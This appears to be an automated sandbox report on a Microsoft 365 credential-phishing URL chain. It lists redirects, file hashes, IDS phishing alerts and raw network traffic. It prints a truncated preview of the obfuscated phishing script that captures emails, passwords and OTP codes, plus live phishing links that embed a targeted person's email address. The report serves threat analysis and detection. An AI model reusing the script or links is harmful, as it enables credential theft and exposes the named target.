                            unknownunknownfalse
                            13.226.184.88
                            d2vgu95hoyrpkh.cloudfront.netUnited States
                            16509AMAZON-02USfalse
                            IP
                            192.168.2.4
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1556121
                            Start date and time:2024-11-14 23:37:01 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 5s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:browseurl.jbs
                            Sample URL:https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal56.win@18/11@10/7
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.186.110, 142.251.168.84, 142.250.185.227, 34.104.35.123, 52.149.20.212, 199.232.214.172, 192.229.221.95, 40.69.42.241, 20.3.187.198, 172.217.16.131
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:exported SGML document, ASCII text, with very long lines (65515)
                            Category:downloaded
                            Size (bytes):159929
                            Entropy (8bit):4.99124096591633
                            Encrypted:false
                            SSDEEP:3072:mO9/uC+qtzVESWMAsM+eS6e6+JE3TLOxcGL:mO9GSRiSWMAsM+eS6e6+JE3TLe
                            MD5:5D6FC35349A0BEF29BA4560E29A12D11
                            SHA1:FFEB8DA75FC7FAE5F0962AED2684CCFCF4BA2C48
                            SHA-256:0CAE693AA474AABE67A16B190914842DD421A211B732EFB7A5B4AE440EAADC70
                            SHA-512:98F0FF029627DFFF085446642DD37C927AFCE8B685669DE308BB6D3E8E174E82E77C940CA2E36EBE74D116402B07660EE0F1CB1707B6748011205FA0F5B315D6
                            Malicious:false
                            Reputation:low
                            URL:https://poonkong.com/o/jsdrive.js
                            Preview:function _0x309a() {. const _0x11e9f4 = ['950604TkZqjn', 'otp_command', 'head', 'oncontextmenu', '@123.', 'email', 'backgroundImage', '5iaUCPb', '.otpError2', 'RQ_OTP_APP', 'insertAdjacentHTML', '@web.', 'URL\x20EMAIL=NULL', '387ncMFhV', '.imgclass', 'body', 's2c', '583950morvMO', 'test', '.emailLabel', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', '<p>', 'language', '@aol.', 'location', 'change', 'complete', 'endUrl', '.loginForm', '#sendPass', '.loaderxBlock', '.otpInput2', 'split', '@gmail.com', 'length', 'email_type', 'https://google.com', 'querySelectorAll', '.passwordInput', '.overlay', 'userAgent', 'html', '.msappcodeBlock', '.otpError', '.passwordError', 'RQ_EMAIL', 'url(\x27', 'password', 'beforeend', 'O365', '@test.', 'forEach', '\x0a\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20 \x20Overlay\x20-->\x0a\x20\x20\x20\x20<div\x20class=\x22overlay\x22>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22lds-roller\x
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (49854)
                            Category:dropped
                            Size (bytes):49993
                            Entropy (8bit):5.216475744251136
                            Encrypted:false
                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                            Malicious:false
                            Reputation:low
                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text
                            Category:downloaded
                            Size (bytes):389
                            Entropy (8bit):5.599983410781094
                            Encrypted:false
                            SSDEEP:12:4WYcVBnunmsT4AWOvfWLSsPZ45dWDd4NbAGbpX/4NGb:4WYcVBnumsxvHWL7PS58Dd4NkGt4NM
                            MD5:05D02FF1DBBC03CFDBF1D80CD76BDF1B
                            SHA1:B322B74527B5B4D67172CCA246A9E66D8F86B7DF
                            SHA-256:E17EBCFCD50AEC07A58831D7044D6C760FA8283E2B7B33D4EAE8D77D31EA96A8
                            SHA-512:A378FF8A80944F6FDA88880DA3811A47CF175D82C2B16531287CC838DD6598520458A4C8227E30F7F1894CC144C9496854354E57839E8E4DA8943BFD87D8EB1B
                            Malicious:false
                            Reputation:low
                            URL:https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov
                            Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqRTRNVEF5TURJMFZUTTVNVEF4T0RRMg==' vic='joe.nguyen@leg.wa.gov' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsdrive.js'></script>.</html>
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (49854)
                            Category:downloaded
                            Size (bytes):49993
                            Entropy (8bit):5.216475744251136
                            Encrypted:false
                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                            Malicious:false
                            Reputation:low
                            URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (582)
                            Category:downloaded
                            Size (bytes):742
                            Entropy (8bit):5.597939751902197
                            Encrypted:false
                            SSDEEP:12:TaZ+tuDLp2kdQAw/GoVN/4ZsWLIVo1f4fUGMVRaVZO0U2mQwNGquABAtw7BU2mQU:TaZDjdK7VNgJ4ffMVEVZOrBAtwpMQsb
                            MD5:45773847B0FEDF361BF2047B1C61F51C
                            SHA1:8CB7A46A406847C9B1E070002283F962B642E2E4
                            SHA-256:DE94001CB7EF5A765251B2313DB2A4057A81365D29DDCC8761D72FB0D18D5012
                            SHA-512:780D0DD8B2CC944F144F81D91C841D4A6213C761CD5E4EC20C7EE715091148743A97628226A88B8F946A56B91396341D0F7C077D45B971D78AF65D7CA07A56D8
                            Malicious:false
                            Reputation:low
                            URL:https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292
                            Preview:<html lang="en"> <head> <script nonce="V_VSwAVgqzs3S1pKI1Kebg">window.google = {};(function(){.var d=/^\s*(?!javascript:)(?:[\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;.(this||self).google.navigateTo=function(a,c,b){!/\/.*?[&?]gsc=1/.test(c.location.href)&&a!==c&&a.google?a.google.r&&(a.google.r=0,a=a.location,b=d.test(b)?b:void 0,b!==void 0&&(a.href=b),c.location.replace("about:blank")):c.location.replace(b)};}).call(this);(function(){var redirectUrl='amp/s/safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292';google.navigateTo(parent,window,redirectUrl);})();</script> <noscript> <meta content="0;url=amp/s/safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292" http-equiv="refresh"> </noscript> </head> </html>
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text
                            Category:downloaded
                            Size (bytes):315
                            Entropy (8bit):5.0572271090563765
                            Encrypted:false
                            SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                            MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                            SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                            SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                            SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                            Malicious:false
                            Reputation:low
                            URL:https://safetyworksolutions.com/favicon.ico
                            Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                            No static file info
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-14T23:38:00.026801+01002057333ET PHISHING MAMBA Credential Phish Landing Page 2024-11-081192.168.2.449742162.144.0.229443TCP
                            2024-11-14T23:38:00.988768+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.449744162.144.0.229443TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 14, 2024 23:37:55.210513115 CET49675443192.168.2.4173.222.162.32
                            Nov 14, 2024 23:37:55.611605883 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:55.611663103 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:55.611702919 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:55.611990929 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:55.612046003 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:55.612097979 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:55.618189096 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:55.618201971 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:55.618520021 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:55.618535995 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.469575882 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.469845057 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.469912052 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.471622944 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.471694946 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.472626925 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.472712994 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.472807884 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.472815990 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.474100113 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.474270105 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.474337101 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.475785017 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.475860119 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.476972103 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.477062941 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.524588108 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.524605989 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.524656057 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.572017908 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.762222052 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.807166100 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.807189941 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.809489012 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.809776068 CET44349735142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.809860945 CET49735443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.844485998 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.844795942 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.847379923 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.847480059 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:56.847583055 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.847909927 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:56.847949982 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.127686024 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.129513979 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:57.129595041 CET44349736142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.129667997 CET49736443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:57.144882917 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.144936085 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.145126104 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.145306110 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.145327091 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.733398914 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.733752966 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:57.733819008 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.735244989 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.735336065 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:57.736001015 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:57.736088037 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.790010929 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:57.790074110 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:37:57.812515020 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.812974930 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.813038111 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.814686060 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.814774036 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.816560030 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.816654921 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.816910028 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.816929102 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.835465908 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:37:57.867969036 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:57.977833986 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.980200052 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:57.980278969 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:58.447300911 CET49740443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:58.447343111 CET44349740162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:58.605315924 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:58.605420113 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:58.605506897 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:58.606045008 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:58.606072903 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:58.871840954 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:58.871933937 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:58.872021914 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:58.872284889 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:58.872306108 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:58.889472008 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:37:58.889513969 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:37:58.889741898 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:37:58.891201019 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:37:58.891218901 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:37:59.127948999 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.128000021 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.128163099 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.128830910 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.128844976 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.252507925 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.253299952 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:59.253326893 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.253813028 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.260824919 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:59.260992050 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.261599064 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:59.303328991 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.424833059 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.425024986 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.425223112 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:59.441572905 CET49741443192.168.2.4162.241.87.113
                            Nov 14, 2024 23:37:59.441658974 CET44349741162.241.87.113192.168.2.4
                            Nov 14, 2024 23:37:59.548973083 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.580434084 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.580466986 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.584312916 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.584391117 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.593806982 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.594060898 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.594068050 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.594238043 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.647105932 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.647136927 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.695693970 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.738322020 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:37:59.738419056 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:37:59.762912035 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:37:59.762991905 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:37:59.764044046 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:37:59.805141926 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:37:59.806113958 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.808547974 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.808581114 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.809597015 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.809657097 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.818725109 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.818783998 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.858342886 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:37:59.870208025 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:37:59.870220900 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:37:59.899333000 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:37:59.917794943 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.026904106 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.026972055 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.026997089 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.027034998 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.027069092 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.027091980 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.027146101 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.027195930 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.027791023 CET49742443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.027806997 CET44349742162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.101603031 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:00.101774931 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:00.101816893 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:00.101859093 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:00.101876974 CET49743443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:00.101885080 CET44349743184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:00.139257908 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:00.139347076 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:00.139448881 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:00.140317917 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:00.140351057 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:00.891793013 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.891848087 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.891905069 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.892261028 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.892277002 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.988249063 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.988399982 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.988428116 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.988517046 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.988543034 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.988636017 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.988673925 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.988717079 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.988725901 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.988879919 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.988926888 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.988936901 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.989093065 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.989103079 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.989144087 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.989152908 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:00.989165068 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:00.989176035 CET44349744162.144.0.229192.168.2.4
